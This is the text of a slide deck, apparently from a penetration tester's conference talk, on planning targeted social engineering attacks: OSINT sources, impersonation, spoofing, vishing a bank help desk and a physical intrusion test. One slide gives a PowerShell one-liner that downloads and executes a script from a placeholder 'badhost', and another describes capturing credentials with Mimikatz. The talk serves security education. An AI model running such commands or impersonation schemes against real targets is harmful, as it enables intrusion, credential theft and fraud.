social imagineering
play

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. - PowerPoint PPT Presentation

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written


  1. SOCIAL IMAGINEERING Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

  2. Ex Experience • Founder of Leap Security Inc. • Security Consultant/Penetration Tester • Forensic Analyst Pu Publica cations • Featured on security magazines • Hackin9, Pentest Magazine, ACAMS Sp Speaker • Conferences across the nation Tools To • InSpy, Pastepwnd, CredCrack @jonathanbroche @LeapSecurity leapsecurity.io // //

  3. Social Engineering @jonathanbroche @LeapSecurity leapsecurity.io // //

  4. Definition • The act of manipulating an individual(s) to obtain X • X is an object or information @jonathanbroche @LeapSecurity leapsecurity.io // //

  5. What’s changed? • Education • Awareness (sorta) • It’s gotten easier for the bad guys too. • Don’t speak English? No problem. • Services to proof read and spell check malicious phishing emails • Not tech savvy? No problem. • Exploit and Ransomware Kits being sold for $500 @jonathanbroche @LeapSecurity leapsecurity.io // //

  6. Attack Methodology Information Gathering Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  7. Attack Methodology (Cont.) • Information Gathering Information • Google, Bing, Shodan Gathering • Social Media – LinkedIn/Twitter/Facebook • Metadata • Surveillance (Physical Intel) Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  8. Attack Methodology (Cont.) • OSINT Favorites • HaveIBeenPwn • https://haveibeenpwned.com/ • OSINT Framework • https://osintframework.com/ • Intel Tools • https://inteltechniques.com/ • Dragnet • https://github.com/tevora- threat/Dragnet @jonathanbroche @LeapSecurity leapsecurity.io // //

  9. Pastepwnd Demo https://github.com/leapsecurity/Pastepwnd @jonathanbroche @LeapSecurity leapsecurity.io // //

  10. Attack Methodology (Cont.) • Attack Preparation Information • Get to know your target Gathering • Pick a persona to impersonate • Obtain target email signature • Build, Buy, or Prepare Tools • Spoof Services • Circumvent defensive technologies Attack Exploitation • Entice users with rewards Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  11. @jonathanbroche @LeapSecurity leapsecurity.io // //

  12. InSpy Demo https://github.com/leapsecurity/InSpy @jonathanbroche @LeapSecurity leapsecurity.io // //

  13. Attack Methodology (Cont.) • Exploitation Information • Slow and steady Gathering • Lateral movement • Sensitive data or objective • Exfiltration Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  14. Common Exploit Techniques • HTA – HTML Applications can be embedded on website • Macros • Executables @jonathanbroche @LeapSecurity leapsecurity.io // //

  15. Common Exploit Techniques (Cont.) • PowerShell • IEX (New-Object Net.WebClient). DownloadString ('http://badhost/hackerscript.ps1’) • C# • Visual Basic @jonathanbroche @LeapSecurity leapsecurity.io // //

  16. PS DownloadString functionality example • Logged into workstations via SMB • Use PowerShell script in memory to capture cleartext credentials using Mimikatz (Wdigest) • Until it found a domain administrator account @jonathanbroche @LeapSecurity leapsecurity.io // //

  17. Example: Vishing • Targeted Customer Service Representatives within the Bank • Impersonated contractor working with help desk • Obtained help desk extension • Discovered MobileIron • Called Help Desk and obtained AD account @jonathanbroche @LeapSecurity leapsecurity.io // //

  18. Example: Spear Phishing • Custom website (HTML, CSS, JS, PHP) • Rebrand scenario @jonathanbroche @LeapSecurity leapsecurity.io // //

  19. Example: Physical Test • Cold brrr, no snow brush • Responder, cracked NTLM hashes • Became friends with security guard • Became best friends with employee and got a tour of the facility @jonathanbroche @LeapSecurity leapsecurity.io // //

  20. Closing and Questions @jonathanbroche @LeapSecurity leapsecurity.io // //

  21. Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Thank you!!! @jonathanbroche @LeapSecurity leapsecurity.io // // LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend